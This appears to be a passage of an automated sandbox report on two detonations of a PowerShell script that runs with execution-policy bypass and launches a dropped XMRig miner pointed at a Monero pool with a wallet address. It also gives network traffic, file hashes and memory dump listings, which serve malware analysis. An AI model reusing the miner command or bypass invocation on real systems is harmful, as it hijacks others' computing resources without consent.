memory/1252-58-0x000001BEE8D30000-0x000001BEE8D50000-memory.dmp
memory/1252-59-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-60-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-61-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-62-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-63-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-64-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-65-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-66-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-67-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-68-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-69-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-70-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-71-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-72-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-73-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-74-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-75-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-76-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-77-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-78-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-79-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-80-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-81-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-82-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-83-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-84-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-85-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-86-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-87-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-88-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-89-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-90-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-91-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-92-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-93-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-94-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-95-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-96-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-97-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-98-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-99-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-100-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-101-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-102-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-103-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-104-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-105-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-106-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-107-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-108-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-109-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-110-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-111-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-112-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-113-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-114-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-115-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-116-0x00007FF78F860000-0x00007FF790493000-memory.dmp
memory/1252-117-0x00007FF78F860000-0x00007FF790493000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win10v2004-20240611-en
Max time kernel
1794s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1112 wrote to memory of 3744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1112 wrote to memory of 3744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| GB | 184.28.176.17:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 17.176.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
memory/1112-0-0x00007FF8C7A13000-0x00007FF8C7A15000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xlw5fz4l.soj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1112-1-0x00000138FCF50000-0x00000138FCF72000-memory.dmp
memory/1112-11-0x00007FF8C7A10000-0x00007FF8C84D1000-memory.dmp
memory/1112-12-0x00007FF8C7A10000-0x00007FF8C84D1000-memory.dmp
memory/1112-14-0x00007FF8C7A10000-0x00007FF8C84D1000-memory.dmp
memory/1112-15-0x00000138FCFC0000-0x00000138FCFD2000-memory.dmp
memory/1112-16-0x00000138FCF30000-0x00000138FCF3A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3744-47-0x000001F683C60000-0x000001F683C80000-memory.dmp
memory/3744-48-0x000001F683CA0000-0x000001F683CC0000-memory.dmp
memory/1112-50-0x00007FF8C7A13000-0x00007FF8C7A15000-memory.dmp
memory/3744-49-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/1112-51-0x00007FF8C7A10000-0x00007FF8C84D1000-memory.dmp
memory/3744-54-0x000001F683CE0000-0x000001F683D00000-memory.dmp
memory/3744-52-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-53-0x000001F683CC0000-0x000001F683CE0000-memory.dmp
memory/1112-56-0x00007FF8C7A10000-0x00007FF8C84D1000-memory.dmp
memory/3744-55-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-57-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-59-0x000001F683CE0000-0x000001F683D00000-memory.dmp
memory/3744-58-0x000001F683CC0000-0x000001F683CE0000-memory.dmp
memory/3744-60-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-61-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-62-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-63-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-64-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-65-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-66-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-67-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-68-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-69-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-70-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-71-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-72-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-73-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-74-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-75-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-76-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-77-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-78-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-79-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-80-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-81-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-82-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-83-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-84-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-85-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-86-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-87-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-88-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-89-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-90-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-91-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-92-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-93-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-94-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-95-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-96-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-97-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-98-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-99-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-100-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-101-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-102-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-103-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-104-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-105-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-106-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-107-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-108-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-109-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-110-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-111-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-112-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-113-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-114-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-115-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-116-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-117-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
memory/3744-118-0x00007FF7280B0000-0x00007FF728CE3000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:14
Platform
win10v2004-20240508-en
Max time kernel
1799s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1060 wrote to memory of 3668 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1060 wrote to memory of 3668 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
Files
memory/1060-0-0x00007FF894C93000-0x00007FF894C95000-memory.dmp
memory/1060-10-0x00000286370A0000-0x00000286370C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xjnhsydl.bg3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1060-11-0x00007FF894C90000-0x00007FF895751000-memory.dmp
memory/1060-12-0x00007FF894C90000-0x00007FF895751000-memory.dmp
memory/1060-14-0x00007FF894C90000-0x00007FF895751000-memory.dmp
memory/1060-15-0x0000028650320000-0x0000028650332000-memory.dmp
memory/1060-16-0x00000286370D0000-0x00000286370DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3668-47-0x000001C871C80000-0x000001C871CA0000-memory.dmp
memory/3668-48-0x000001C871CC0000-0x000001C871CE0000-memory.dmp
memory/3668-49-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-52-0x000001C871D00000-0x000001C871D20000-memory.dmp
memory/3668-51-0x000001C871CE0000-0x000001C871D00000-memory.dmp
memory/3668-50-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/1060-53-0x00007FF894C93000-0x00007FF894C95000-memory.dmp
memory/1060-54-0x00007FF894C90000-0x00007FF895751000-memory.dmp
memory/3668-55-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/1060-56-0x00007FF894C90000-0x00007FF895751000-memory.dmp
memory/3668-57-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-59-0x000001C871D00000-0x000001C871D20000-memory.dmp
memory/3668-58-0x000001C871CE0000-0x000001C871D00000-memory.dmp
memory/3668-60-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-61-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-62-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-63-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-64-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-65-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-66-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-67-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-68-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-69-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-70-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-71-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-72-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-73-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-74-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-75-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-76-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-77-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-78-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-79-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-80-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-81-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-82-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-83-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-84-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-85-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-86-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-87-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-88-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-89-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-90-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-91-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-92-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
memory/3668-93-0x00007FF7EB770000-0x00007FF7EC3A3000-memory.dmp
